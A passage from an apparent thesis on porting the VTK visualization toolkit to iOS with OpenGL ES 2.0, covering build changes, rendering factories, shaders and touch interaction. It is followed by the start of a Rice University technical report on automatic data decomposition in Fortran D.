in this case since there will be no attempt at submitting a working application to the AppStore, however an Apple approved developer profile is still needed to be set up in order to test the software on an actual iOS device. 5.3 iOS - Simulator and Hardware To compile, build and run a target, a platform on which to compile the code on must be selected for the requested target. This is easily done in XCode via the GUI. Available platform are dependent on the build settings for each target. In this case, since the build settings where changed to be iOS compatible, the selectable platforms are “iPad 4.3 Simulator” and “iOS device”. If the application is built and executed using the iPad simulator, the application is launched in a simulated iPad environment on the local development machine. If we instead choose to build and run on an iOS device, an iPad has to be connected to the computer via usb, and a developer profile must be set up as described earlier. Figure 9: Running an OpenGL ES 2 application on an iPad Simulator in XCode 6 Compiling and Running VTK on iOS 6.1 System overview VTK consists of several targets with some interdependency. The targets are considered to be logical delimited parts of the system. Below are some examples of the more central targets in play. vtkCommon Contains the most general type of classes. Most other targets depend on vtkCommon. The target provides some basic patterns used by the system, and an extensive amount of data structures such as vtkObjectBase, vtkObject, vtkObjectFactory, vtkAbstractArray, vtkParametricTorus, vtkMath and more. vtkIO As the name suggest, this target is responsible for data input and output. vtkIO is dependent on many other targets, amongst those, vtkjpeg and vtkpng which are needed to handle reading and writing of jpg and png files. vtkFiltering/ vtkGraphics These targets contain classes representing graphical data and transformation/filtering of graphical data. vtkGraphics is dependent on vtkFiltering which holds basic graphical objects such as vtkVertex, vtkQuad, vtkPolyData, vtkSpline, and classes for graphics transformation and filtering. vtkGraphics include more complex graphical objects and classes responsible for transforming and filtering, e.g. vtkQuadraticClustering and vtkRibbonFilter. vtkRendering This is the target containing classes responsible for rendering graphics to a device. It’s an integral part of the thesis, and will be studied thoroughly in coming chapters. 6.2 vtkRendering Target Dependency Hierarchy Figure 10 illustrates the target dependency hierarchy of the vtkRendering target. This implies that all dependent targets must compile and run for vtkRendering to compile. Some targets are able to compile and run out of the box, while some others need modification and/or major changes. This is described thoroughly in the coming chapter. --- Figure 10: Target dependency hierarchy for vtkRendering 6.3 Modifying Targets This chapter describes how VTK was modified to provide code that compiles and runs on iOS without the actual implementation of the rendering. Only vtkRendering and its library dependencies are taken into consideration. This leaves some higher level parts of VTK out, such as vtkVolumeRendering, vtkHybrid and vtkWidgets which all depend on vtkRendering. The main approach to compiling and running vtkRendering was done through trial and error. Since little was known about VTK and what is potentially compatible on iOS and not, no effort was placed modifying the build process in CMake. Instead, a Mac OS build was produced with CMake as a starting point and the project was modified thereafter. This of course breaks the cross platform support that CMake provides, though our primary focus is to investigate how to modify VTK for iOS support, which is a prerequisite for extending the build process. Vtkftgl and vtkFreetype Vtkftgl has some minor OpenGL implementations of font rendering. To maintain font rendering support this target needs reimplementation in GLES 2.0. Vtkftgl is dependent on vtkFreetype [11], a wrapper around freetype, which is a free software font engine written in C. There is no iOS binary available of freetype, but with the source being written in C and free to download it is possible to build an iOS compatible binary [12]. The vtkFreetype target needs only to be linked with an iOS compiled freetype binary. VtkGraphics, vtkCommon, vtkFiltering and vtkVerdict The vtkGraphics target, along with its dependencies (vtkCommon, vtkFiltering, vtkVerdict) was successfully compiled and run on an iPad only by configuring the build settings for iOS. VtkImaging VtkImaging is a library in VTK providing some basic image processing functionality such as high/low-pass filtering, calculating image gradient, laplacian, and many other standard image processing tasks. This target can also produce a working iOS binary only by changing the build settings. VtkIIO VtkIIO is at its current state incompatible with iOS. It depends on a command line tool, which is executed during compilation to generate files needed by vtkIIO. Command line tools are not supported in iOS, hence compile errors are produced while trying to build the target. The command line tool that vtkIIO depends on is responsible for creating GLSL [13] shader files that are written to a material library folder. This dependency was removed since support of built in shaders is not a priority. In order to support the creation of shaders during compilation, either the code that creates the shaders needs be changed to not be a command line tool; alternatively shaders for iOS devices can be generated and prepackaged with VTK. VtkIO also depends on the target vtktiff, which in turn depends on an additional command line tool target. This target is responsible for initializing and writing fax decoder tables [14] and Huffman code tables [15] to files, which are included in the build and used by vtktiff. Just as the shader files, either the code needs to be changed to not be a command line tool, or the files can be created once for iOS and be prepackaged with VTK. The vtktiff target was removed as a dependency to vtkIO. This essentially removes support for file compression and decompression. Additionally, some other classes had to be removed from vtkIO for compilation to succeed. These are classes for decoding and encoding video, such as video for windows [16], MPEG2 [17] and oggtheora [18]. Furthermore classes for interfacing with MySQL and PostgreSQL databases do not compile due to necessary header files missing. iOS support for the mentioned classes could possibly be added but is considered as out of scope for this work. With these modifications done the vtkIO target compiles and runs on iOS. VtkParseOGLExt The target is a command line tool executed by the vtkIO target before compilation, which reads OpenGL extension header files and outputs VTK code that handles OpenGL extensions in a more platform-independent manner. It takes as input an OpenGL extensions header file (glext.h), a GLX extensions header file (wglext.h), a WGL extensions header file (wglext.h) [19] and writes a new header file for handling OpenGL extension (vtkgl.h). The tool is based on OpenGL and writes OpenGL specific code to the generated header. The generated file is not compatible with iOS since it, amongst other things, includes OpenGL specific header files. The tool needs to be re-written, or preferably a new tool needs to be made, that handles extension for OpenGL ES. VtkEncodeString VtkEncodeString, also a command line tool, is used to encode a string in a C++ file from a text file. It is used by vtkRendering to encode GLSL [13] source files. The program itself is compatible with iOS, but not its command line execution, which needs to be modified. VtkRendering The rendering implementations of VTK require major changes in form of new GLES 2.0 implementations to run on an iPad or any other GLES 2.0 compatible device. This showed to be a comprehensive task since the OpenGL rendering implementation in VTK makes wide use of the fixed function pipeline, which is not supported in GLES2. A new vtkRendering target was created specifically for iOS where VTK rendering classes were placed to which new GLES2 and iOS specific implementations could be added. 7 VTK Frameworks This chapter describes relevant frameworks and design patterns used by VTK, which are necessary to have knowledge of in order to extend and/or customize the source for new platform support. 7.1 Rendering The core of the VTK rendering framework is located within the vtkRendering target. VtkRendering consists of a set of abstract classes that make up an API with the necessary rendering elements to describe a scene. An example of this are the classes vtkRenderer, vtkRenderWindow, vtkLight, vtkCamera, vtkActor and vtkProp, that combined together in code makes up a scene which is rendered onto a device. The classes mentioned do not perform any actual rendering, since rendering depends on the underlying hardware and software. The VTK rendering classes are abstract and need to be in parts implemented or extended to perform the actual rendering. The rendering framework is independent of the underlying implementations, which is one of the design goals of VTK [2]. This section describes how a minimal rendering context can be created and how VTK objects interact to choose the rendering implementations for the desired platform. A minimal rendering context in this case is defined as the instances of necessary VTK classes needed to display a window in iOS using the VTK framework. Creating and running a minimal rendering context in VTK is demonstrated by the following code. ```cpp #include "vtkRenderWindow.h" #include "vtkRenderer.h" #include "vtkSmartPointer.h" int main(int argc, char *argv[]) { vtkSmartPointer<vtkRenderWindow> window = vtkSmartPointer<vtkRenderWindow>::New(); vtkSmartPointer<vtkRenderer> renderer = vtkSmartPointer<vtkRenderer>::New(); window->addRenderer(renderer); window->render(); return 0; } ``` As the code suggest, first a window is creating by calling the function “New” on vtkRenderWindow, or in this case vtkSmartPointer, that delegates to vtkRenderWindow, and returns the platform specific implementation of a vtkRenderingWindow. The next step is to create a renderer object. The renderer is added to the render window. Calling the function render on the window renders the current state of the scene onto the window. In this case the result is a black window since no geometry, materials, lights or cameras are added to the scene. **VtkRenderWindow** VtkRenderWindow is an Abstract object to specify the behavior of a rendering window. A rendering window is a window in a graphical user interface where images are drawn. Figure 11 shows the inheritance diagram for vtkRenderingWindow. Polymorphism [20] is widely used in VTK to create layers of abstraction. VtkRenderWindow defines several virtual functions that are inherited and partly implemented by vtkOpenGLRenderWindow. Since OpenGL does not handle platform specific windowing systems some functions are inherited further down to the concrete platform specific implementations of window handling. ![Inheritance diagram of vtkRenderWindow](image) **Figure 11: Inheritance and subclass diagram of vtkRenderWindow** Most VTK objects inherit directly or indirectly from the class vtkObject. VtkObject provides some basic functions, one of which is the function “New” that takes no parameters and returns a vtkObject pointer. Inheriting classes override this function to instantiate an object of the calling class. Often the function “New” delegates the instantiation to an object factory that determines which implementation is going to be used. ![Class and collaboration diagram for instansiating a vtkRenderWindow](image) **Figure 12: Class and collaboration diagram for instansiating a vtkRenderWindow** Figure 12 shows how calling the “New” function creates a vtkRenderWindow object. VtkRenderWindow does not create an object but instead delegates to vtkGraphicsFactory that determines which implementation will be used given the class name as in parameter. VtkGraphicsFactory in turn delegates to vtkObjectFactory that tries to create the object. If vtkObjectFactory fails, control falls to vtkGraphicsFactory. In the case of vtkRenderWindow, vtkGraphicsFactory is responsible for instantiation. VTK extensively uses macro definitions [21] to define what libraries the build supports. To support iOS, new macro definitions have to be added to follow the design patterns. The macros are defined in the CMake configuration and are set during the CMake build process. For this project, the macros are hard coded for the sake of simplicity. The graphics factory creates an instance of the concrete implementing class vtkIOSRenderWindow, which inherits vtkGLESRenderWindow and returns an object of the type vtkRenderWindow. From a VTK users point of view, concrete implementation classes are never handled, these are, as described, handled by the framework and the user needs only to worry about how the abstract VTK classes work to implement the rendering functionality. **vtkRenderer** VtkRenderer provides an abstract specification for renderers. A renderer controls the rendering process for objects. Rendering is the process of converting geometry, specification of lights and a camera view to pixels. The render function of vtkRenderWindow loops through each renderer that exist in the window, and draws the image produced by each renderer. The vtkRenderer instance is created analogous to vtkRenderWindow as demonstrated in the previous section. In fact, the vtkGraphicsFactory class creates all graphics objects. As said, the creation of objects must me modified to create new GLES2 and iOS specific implementations. ![Inheritance and subclass diagram of vtkRenderer](image.png) Extending VTK factories To make the iOS adaption of VTK usable it is necessary not to break the design pattern for creating VTK objects. In an ideal situation, a visualization application that uses VTK should work on an iPad without modification to the application itself by building against an iOS binary of VTK. Calling the static function named “New” on a VTK class creates an instance of the desired class with the underlying implementation hidden. Of course the programmer could create an instance of the desired concrete implementation of the class, which is not the recommended usage of VTK, but that would make the application platform dependent. The call to “New” delegates to a factory class with the class name as in parameter and receives a concrete implementation of that class type casted to the callers’ type, if one can be found. VtkObjectFactory is the base factory class that other factories sub class. In the case of graphics objects, which are our main concern, objection creation is delegated to a graphics factory. The function of the graphics factory is straightforward. Given a class name and a set of pre defined macros the factory simply uses the macros to determine what platform is being used and the class name to determine which object to create. Below is an extract from the class vtkObjectFactory to demonstrate this. ```c #ifndef VTK_USE_COCOA if( !vtkGraphicsFactory::GetOffScreenOnlyMode() ) { if( strcmp( vtkclassname, "vtkRenderWindowInteractor" ) == 0 ) { return vtkCocoaRenderWindowInteractor::New(); } } if( strcmp( vtkclassname, "vtkRenderWindow" ) == 0 ) { return vtkCocoaRenderWindow::New(); } #endif ``` At this point in the code, if we are building for Mac OS, are using Cocoa and vtkclassname is “vtkRenderWindow”, an instance of vtkCocaRenderWinow will be created and returned to vtkRenderWindow which will cast the instance to a vtkRenderWindow. One could extend this approach, add macro definitions for iOS and GLES2 and return instances of new implementations of the necessary classes. An alternative method would be to create a new graphics factory specifically for GLES2 implementations that is delegated to from the main graphics factory, or added to the vtkRendering target in favor of the current graphics factory during the build process. 7.2 Window and View handling A window in iOS differs from windows in supported operating system of VTK in that an iOS window has a more limited role. Window objects in iOS are called UIWindow, compared to NSWindow on Mac OS. An iOS application can technically have more that one window, with windows layered on top of each other, but an application is by convention limited to a single window. A UIWindow always occupies the entire screen and has no title or controls and cannot be manipulated by the user [22]. This of course adds the limitations of not being able to manipulate windows (resizing) and only showing one window at a time while using VTK on iOS. Although the goal is to make the usage of VTK on iOS transparent for the user these limitations must be taken into consideration when creating applications. The role of a UIWindow is to display the application’s visible content, it delivers touch events to the views and other object and handles orientation changes. A UIWindow can be created using xib files (A file format defining user interfaces for OS X and iOS) or programmatically during applications startup. A UIWindow can hold one or many views. A view is responsible for drawing content into its rectangular area and handling touch events. Views in iOS are of the type UIView and can be subclassed to create custom views. For VTK a GLES 2.0 view is needed for rendering. UIWindow A UIWindow naturally maps to vtkRenderWindow. The vtkRenderWindow is responsible for setting up and manipulating windows, so is UIWindow. To implement our own iOS window for VTK we need to subclass vtkRenderWindow. VtkRenderWindow has a number of virtual functions that are left to the implementing classes to handle, such as the virtual functions “Start()”, “Render()” and “Finalize()”. “Start()” initializes the rendering process, “Render()” asks each renderer owned by the render window to render its image, and “Finalize()” ends the rendering process. An iOS application is launched in the main function using the following function call [23]: ```c int UIApplicationMain( int argc, char *argv[], NSString *principalClassName, NSString *delegateClassName ): ``` The call creates the application object and the application delegate and set up the event cycle. The arguments argc and argv are usually the same parameters as passed to the main function. PrincipalClassName is the name of the UIApplication class or subclass. This is usually set to nil, which assumes hints about what each implemented function to sub framework is supposed to work and a great deal of trial and error. One approach is rendering, but to investigate how it could be done. This work does not concentrate on creating the actual implementations of GLES2 and most time-consuming concerns in making VTK iOS compatible is changing the rendering implementation from OpenGL to GLES 2.0. Since VTK has as a design goal to be platform independent and rendering library independent the framework is created independent of OpenGL, although VTK only supports OpenGL rendering. This practically means that we can create new classes that implement the abstract VTK rendering classes as we see fit and create new factories that override the old ones. We could completely disregard the current rendering implementations and start implementing GLES2 code from scratch. This work does not concentrate on creating the actual implementations of GLES2 rendering, but to investigate how it could be done. One approach is, as mentioned, to throw away the OpenGL implementations and start from scratch. This will require extensive knowledge how the rendering framework is supposed to work and a great deal of trial and error. We only have to subclass the VTK rendering classes and rely on VTK documentation to give us hints about what each implemented function should do. Another approach that might be faster and require less VTK framework knowledge is to create the implementing classes and try to copy as much of the current OpenGL code as possible. This is possible since GLES 2.0 is defined as a subset of OpenGL 2. The first step would be to identify the differences between OpenGL 2 and GLES 2.0. The API documentation for each library gives us a list of functions that are available. The design difference between OpenGL 2 and GLES2 is in principle that, whatever is not supported in GLES2 can be done with shaders. Upon identifying code that uses the unsupported fixed function pipeline, that code can be removed and replaced by the loading the corresponding fragment and vertex shaders. As an example the class vtkOpenGLLight is responsible for specifying light sources in a scene. It implements a single function Render() that specifies each light source by calling the OpenGL function glLightfv. The function call is not supported by GLES 2.0 and therefore needs to be replaced with shaders. Instead of making the function call we can store the lights specifications as vertex arrays and load the vertex and fragment shaders for the desired lighting effect. The same approach can be applied to texturing, geometry transformation and other unsupported OpenGL functions. Instead of calling the function, we store the necessary shading information in vertex arrays and load the desired shader programs before rendering our geometry. **Shaders** Although VTK mostly uses the fixed function pipeline to perform its rendering, shaders using GLSL are supported. VTK provides a framework for handling shaders, such as compiling, loading and binding shader programs and applying different shaders to different vtkActors. Shaders in VTK are encapsulated in a material [24]. A material is described in an xml file. The material description includes: - Which vertex and fragment shaders to use - Shader language - Entry routine of the shader - Uniform variables passed to the shaders - Surface properties such as ambient and specular color A material is applied to an actor by calling vtkProperty::LoadMaterial(const char*) on the actors vtkProperty object instance. When a material is loaded, the vtkProperty is updated with the data in the material file and the appropriate subclass of vtkShaderProgram is instantiated. VtkShaderProgram compiles and binds a shader every time an actor is rendered [25]. To go from the fixed function pipeline to a completely shader based rendering in VTK, we first need to create a library of GLSL shaders and define xml material files. In VTK materials are optionally added to vtkProperty. If GLES2 is used as the concrete rendering implementation, this can no longer be optional. Materials must always be added to vtkProperty objects in order to use shaders. Once the fixed function rendering is removed in favor of shaders, a standard set of materials applied as default can replace the functionality of the current rendering implementation, practically making it optional to use materials. 7.4 Interaction Another aspect that differentiates the iPad from current VTK supported platforms is the interaction capabilities. Instead of using a traditional mouse to transform camera and geometry one uses the multi touch support of the iPad to perform gestures. This section gives a brief introduction on the interaction capabilities of the VTK framework and some insights on multi touch gestures on VTK and iPad. VTK interaction framework VTK has a couple of abstract classes that handle interaction and events, mainly vtkRenderWindowInteractor, vtkInteractorStyle and vtkInteractorObserver. VtkRenderWindowInteractor provides a platform-independent interaction mechanism for mouse, key and timer events. It is a base class for platform dependent implementations. A subclass of vtkRenderWindowInteractor listens for platform events, translates and routes event messages to vtkInteractorStyle. VtkInteractorObserver is an abstract superclass for subclasses that observe events invoked by vtkRenderWindowInteractor. VtkInteractorStyle is a subclass of vtkInteractorObserver. VtkRenderWindowInteractor forwards events to vtkInteractorStyle that provides an event driven approach to the rendering window. Interaction in iOS Event handling in iOS [26] is available in the UIKit library. To handle multitouch events, a subclass of a responder class must be created, which can be a subclass of a UIView. To receive and handle multitouch events one or several of the following methods must be implemented in the views controller. ``` (void)touchesBegan:(NSSet *)touches withEvent:(UIEvent *)event; (void)touchesMoved:(NSSet *) touches withEvent:(UIEvent *)event; (void)touchesEnded:(NSSet *) touches withEvent:(UIEvent *)event; (void)touchesCancelled:(NSSet *) touches withEvent:(UIEvent *)event; ``` The events are handled by evaluating the properties of the set of touches and proceeding accordingly. There is also the possibility to use gesture recognizers, which simplifies the handling of gestures. In that case, one must subclass the UIGestureRecognizer class. Instead of receiving raw touch events one receives gesture events that are commonly used in iOS. Gestures that can be recognized are, tapping, pinching in and out (for zooming), panning or dragging, swiping, rotating and long press. Gesture recognizers are attached to a view and deliver touch objects to the view after a gesture has been recognized. When a gesture or touch event has been received it is up to the programmer to transform the graphics accordingly. iOS supports additional events such as, shaking the device, and GPS events. These events are delivered similarly to touch events. **Short on iOS multitouch in VTK** Adding iOS multitouch support to VTK requires new implementations of vtkRenderWindowInteractor and vtkInteractorStyle. The role vtkRenderWindowInteractor subclass would be to intercept touch events or gesture events from iOS and also handle timing events and the event thread in a platform dependent manner. The events sent to vtkInteractorStyle must be extended to support platform independent descriptions of touch events. 8 Conclusions From the investigation and work done we can conclude that VTK for the most part can be modified and extended to run on iPad thanks to the design of VTK. To add GLES 2.0 and iOS support in a way that makes sense, the CMake build process needs major refactoring, so that the user can download the VTK source and produce an XCode project ready for iOS integration. Ideally the GLES2 and iOS part of VTK should be integrated into the VTK project be and developed alongside “standard” VTK. As discussed in chapter 5.1, the CMake build files require modifications to handle new platforms. The CMakeList.txt file for the each target needs new macros defining GLES and iOS specific building options to add the correct files to the target during the build step. We also need to configure CMake to link the targets to required iOS libraries and set iOS compatible build options. The issues encountered while trying to compile and run VTK, described in chapter 6 “Compiling and Running VTK on iOS”, must be addressed. One issue was generation of required OpenGL extension files, which simply is incompatible with GLES 2.0. A proposed solution is to generate VTK extension files for each supported hardware platform, package the file with the build and use CMake to link the correct file to the build depending on configuration. Another issue is the generation of material files. This can also be resolved by removing the command line tool that is executed before compilation and create a library of material files that are included in the build. Parts of the vtkIO target and dependent targets could not be compiled due to missing libraries for iOS. Although this is a small delimited part with no affect on this work, further investigation is needed to determine what can be supported and not. This concerns support for video encoding and decoding, compression, and database interfacing. The largest part of making VTK iOS compatible is of course the OpenGL rendering implementation, which requires a lot of additional work. While spending a lot of time looking at the rendering implementation of VTK and studying the VTK frameworks, it was concluded that the fixed function pipeline of OpenGL is widely used, with no trivial way of porting the OpenGL code to GLES 2.0. However, GLES 2.0 is defined as a subset of OpenGL 2, which entails that a lot of compatible code can be reused while use of the unsupported fix function pipeline has to be replaced by shaders using the material framework provided by VTK, described in chapter 7.3 “Porting OpenGL to OpenGL ES 2.0”. To provide iOS specific window handling is relatively problem free since the VTK framework is created for cross-platform support. New iOS implementations of vtkRenderWindow and vtkRenderer are needed to interface with the UIWindow and UIView APIs of iOS. Interaction in iOS differs a great deal from mouse interaction. VTK provides us with an interaction framework where a vtkRenderWindowInteractor is attached to a vtkRenderWindow to enable manipulation of the scene. The framework offers an abstract way of handling interactions and makes almost no assumptions regarding the underlying physical form of interaction. New interaction implementations can be added by inheriting the classes described in 7.4 “Interaction”. The iOS SDK supplies comprehensive support for event handling and gesture recognition, which helps in implementing multitouch support for iOS. Though a desirable approach might be to create an abstract multitouch interaction layer on top of VTK's current interaction framework to facilitate a common way for different devices to implement their own multitouch logic. 8.1 Why not OpenGL ES 1.1? One could ask why GLES 1.1 wasn't investigated instead of GLES ES 2.0 since GLES 1.1 supports the fixed function pipeline. The main issue with GLES 1.1 is that it does not support a programmable pipeline. Since rendering in VTK is based on OpenGL 2 and shaders are supported in VTK, using GLES 1.1 would remove support of shaders and materials in VTK. Another concern is the fact that OpenGL moves in the direction of removing the fixed function pipeline in favor of shaders. In GLES 2.0 the fixed function pipeline is not supported, which is also the case for OpenGL 3.1 and newer versions. 8.2 Future work There remains a major amount of work to be done to get a working prototype of VTK running on iOS. Below is a summary of the work left to be done for VTK to be fully iOS compatible, some of which are investigated in this work, and others not. - The CMake build process needs revision to be able to produce a working iOS project - The OpenGL rendering classes have to be re-implemented in GLES 2.0 and added to the build process - Any required files such as xml materials, decoder tables etc must be created and come packaged with the build, alternative generated in a way that is compatible with iOS execution. - Consideration must be taken into how user interaction using touch and multitouch devices should be handled and new implementing classes are needed. - Scripting languages that wraps VTK, such as Tcl/Tk and python should be investigated to determine the possibility of iOS support. - Higher level libraries which where not taken into consideration must be further investigated - Volume rendering in VTK will require additional GLES 2 re-implementations. - The vtkWidget library needs revision since all widgets might not be suitable for the platform. References
{"Source-Url": "http://www.nada.kth.se/utbildning/grukth/exjobb/rapportlistor/2012/rapporter12/ohanian_sason_12034.pdf", "len_cl100k_base": 11321, "olmocr-version": "0.1.53", "pdf-total-pages": 38, "total-fallback-pages": 0, "total-input-tokens": 109214, "total-output-tokens": 14425, "length": "2e13", "weborganizer": {"__label__adult": 0.0003178119659423828, "__label__art_design": 0.0005750656127929688, "__label__crime_law": 0.00021004676818847656, "__label__education_jobs": 0.00039315223693847656, "__label__entertainment": 7.742643356323242e-05, "__label__fashion_beauty": 0.0001379251480102539, "__label__finance_business": 0.00012171268463134766, "__label__food_dining": 0.0002739429473876953, "__label__games": 0.0009446144104003906, "__label__hardware": 0.001117706298828125, "__label__health": 0.00020873546600341797, "__label__history": 0.00024437904357910156, "__label__home_hobbies": 6.198883056640625e-05, "__label__industrial": 0.0002834796905517578, "__label__literature": 0.00019168853759765625, "__label__politics": 0.00019800662994384768, "__label__religion": 0.0003941059112548828, "__label__science_tech": 0.00849151611328125, "__label__social_life": 5.620718002319336e-05, "__label__software": 0.0053558349609375, "__label__software_dev": 0.9794921875, "__label__sports_fitness": 0.0002453327178955078, "__label__transportation": 0.00037169456481933594, "__label__travel": 0.00016319751739501953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 59618, 0.02031]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 59618, 0.45143]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 59618, 0.84414]], "google_gemma-3-12b-it_contains_pii": [[0, 165, false], [165, 532, null], [532, 1470, null], [1470, 2507, null], [2507, 6544, null], [6544, 7033, null], [7033, 9221, null], [9221, 11294, null], [11294, 12555, null], [12555, 14104, null], [14104, 15688, null], [15688, 17668, null], [17668, 18680, null], [18680, 18980, null], [18980, 20809, null], [20809, 22398, null], [22398, 22636, null], [22636, 23689, null], [23689, 25468, null], [25468, 25543, null], [25543, 26987, null], [26987, 27434, null], [27434, 30084, null], [30084, 32828, null], [32828, 35005, null], [35005, 36481, null], [36481, 38467, null], [38467, 40788, null], [40788, 43293, null], [43293, 44656, null], [44656, 47265, null], [47265, 49926, null], [49926, 50855, null], [50855, 53918, null], [53918, 56328, null], [56328, 58085, null], [58085, 59618, null], [59618, 59618, null]], "google_gemma-3-12b-it_is_public_document": [[0, 165, true], [165, 532, null], [532, 1470, null], [1470, 2507, null], [2507, 6544, null], [6544, 7033, null], [7033, 9221, null], [9221, 11294, null], [11294, 12555, null], [12555, 14104, null], [14104, 15688, null], [15688, 17668, null], [17668, 18680, null], [18680, 18980, null], [18980, 20809, null], [20809, 22398, null], [22398, 22636, null], [22636, 23689, null], [23689, 25468, null], [25468, 25543, null], [25543, 26987, null], [26987, 27434, null], [27434, 30084, null], [30084, 32828, null], [32828, 35005, null], [35005, 36481, null], [36481, 38467, null], [38467, 40788, null], [40788, 43293, null], [43293, 44656, null], [44656, 47265, null], [47265, 49926, null], [49926, 50855, null], [50855, 53918, null], [53918, 56328, null], [56328, 58085, null], [58085, 59618, null], [59618, 59618, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 59618, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 59618, null]], "pdf_page_numbers": [[0, 165, 1], [165, 532, 2], [532, 1470, 3], [1470, 2507, 4], [2507, 6544, 5], [6544, 7033, 6], [7033, 9221, 7], [9221, 11294, 8], [11294, 12555, 9], [12555, 14104, 10], [14104, 15688, 11], [15688, 17668, 12], [17668, 18680, 13], [18680, 18980, 14], [18980, 20809, 15], [20809, 22398, 16], [22398, 22636, 17], [22636, 23689, 18], [23689, 25468, 19], [25468, 25543, 20], [25543, 26987, 21], [26987, 27434, 22], [27434, 30084, 23], [30084, 32828, 24], [32828, 35005, 25], [35005, 36481, 26], [36481, 38467, 27], [38467, 40788, 28], [40788, 43293, 29], [43293, 44656, 30], [44656, 47265, 31], [47265, 49926, 32], [49926, 50855, 33], [50855, 53918, 34], [53918, 56328, 35], [56328, 58085, 36], [58085, 59618, 37], [59618, 59618, 38]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 59618, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
e5f507dac8a810ab6f7c34dd722732040609af65
Automatic Data Alignment and Distribution for Loosely Synchronous Problems in an Interactive Programming Environment Ulrich Kremer Ken Kennedy CRPC-TR91205-S April 1991 Center for Research on Parallel Computation Rice University 6100 South Main Street CRPC - MS 41 Houston, TX 77005 Automatic Data Alignment and Distribution for Loosely Synchronous Problems in an Interactive Programming Environment Ken Kennedy Ulrich Kremer ken@rice.edu kremer@rice.edu Department of Computer Science Center for Research on Parallel Computation Rice University P.O. Box 1892 Houston, Texas 77251 Abstract An approach to distributed memory parallel programming that has recently become popular is one where the programmer explicitly specifies the data layout using language extensions, and a compiler generates all the communication. While this frees the programmer from the tedium of thinking about message-passing, no assistance is provided in determining the data layout scheme that gives a satisfactory performance on the target machine. We wish to provide automatic data alignment and distribution techniques for a large class of scientific computations, known in the literature as loosely synchronous problems. We propose an interactive software tool that allows the user to select regions of the sequential input program, then responds with a data decomposition scheme and diagnostic information for the selected region. The proposed tool allows the user to obtain insights into the characteristics of the program executing on a distributed memory machine and the behavior of the underlying compilation system without actually compiling and executing the program on the machine. An empirical study of actual application programs will show whether automatic techniques are able to generate data decomposition schemes that are close to optimal. If automatic techniques will fail to do so, we want to answer the questions (1) how user interaction can help to overcome the deficiencies of automatic techniques, and (2) whether, in particular, there is a data-parallel programming style that allows automatic detection of efficient data alignment and distribution schemes. 1 Introduction Although distributed memory parallel computers are among the most cost-effective machines available, most scientists find them difficult to program. The reason is that traditional programming languages support single name spaces and, as a result, most programmers feel more comfortable working with a shared memory programming model. To this end, a number of researchers [CK88, CCL88, KMV90, PSvG91, RA90, RP89, RSW88, ZBG88, KZBG88, Ger89] have proposed using a traditional sequential or parallel shared-memory language extended with annotations specifying how the data is to be mapped onto the distributed memory machine. This approach is inspired by the observation that the most demanding intellectual step in rewriting programs for distributed memory is the data layout — the rest is straightforward but tedious and error prone work. The Fortran D language and its compiler [FHK+90, HKT92b] follow this approach. Given a Fortran D program the compiler mechanically generates the node program for a given distributed-memory target machine. A problem with this approach is that it does not support the user in the decision process about a good data layout. We want to propose the development of automatic techniques for data alignment and distribution for regular loosely synchronous problems that deal with realignment/redistribution, data replication, procedure calls, and control flow. Loosely synchronous problems represent a large class of scientific computations [FJL+88]. They can be characterized by computation intensive regions that have substantial parallelism, with a synchronization point between the regions. We restrict our proposed system to regular loosely synchronous problems with arrays as their major data structures. In addition, we will allow regular problems that give rise to wavefront style computations [Lam74]. We do not handle representations of data objects as they occur, for instance, in irregular problems like sparse matrix and unstructured mesh computations [SCMB90, WSHB91, KMV90]. We will investigate the feasibility of these new automatic techniques in the context of an interactive system. The proposed automatic data decomposition tool is part of the Fortran D programming environment as shown in Figure 1. The automatic data partitioner may be applied to an entire program or on specific program fragments. When invoked on an entire program, it automatically selects data decompositions without further user interaction. The feasibility of the automatic system is determined by the ‘quality’ of the generated data decomposition schemes compared to schemes that are considered optimal. This quality measure has to be defined a priori to our investigation in order to guarantee an unbiased discussion of results gained by an empirical study of our techniques applied to real programs. If it will turn out that automatic data decomposition is not feasible for some applications we want to discuss why automatic techniques failed and how user interaction can help to overcome its deficiencies. In particular, we want to investigate whether there is a data-parallel programming style for sequential programs that facilitates automatic data alignment and distribution. The existence of a usable programming style in the context of vectorization has been observed by some researchers [CKK89, Wol89] and is partially responsible for the success of automatic vectorization. We believe that for regular loosely synchronous problems written in a data-parallel programming style, the automatic data partitioner can determine an efficient decomposition scheme in most cases. However, we do not believe that fully automatic techniques will be successful for ‘dusty deck’ programs. After a short introduction to Fortran D, we motivate the need for automatic data decomposition. A discussion of our approach to to automatic data alignment and distribution follows. The rest of the paper gives a description of the success/failure criterion for the proposed automatic techniques. An overview of related work together with our research goals and contributions conclude the paper. 2 Fortran D The data decomposition problem can be approached by considering the two levels of parallelism in data-parallel applications. First, there is the question of how arrays should be \textit{aligned} with respect to one another, both within and across array dimensions. We call this the \textit{problem mapping} induced by the structure of the underlying computation. It represents the minimal requirements for reducing data movement for the program, and is largely independent of any machine considerations. The alignment of arrays in the program depends on the natural fine-grain parallelism defined by individual members of data arrays. Second, there is the question of how arrays should be \textit{distributed} onto the actual parallel machine. We call this the \textit{machine mapping} caused by translating the problem onto the finite resources of the machine. It is affected by the topology, communication mechanisms, size of local memory, and number of processors in the underlying machine. The distribution of arrays in the 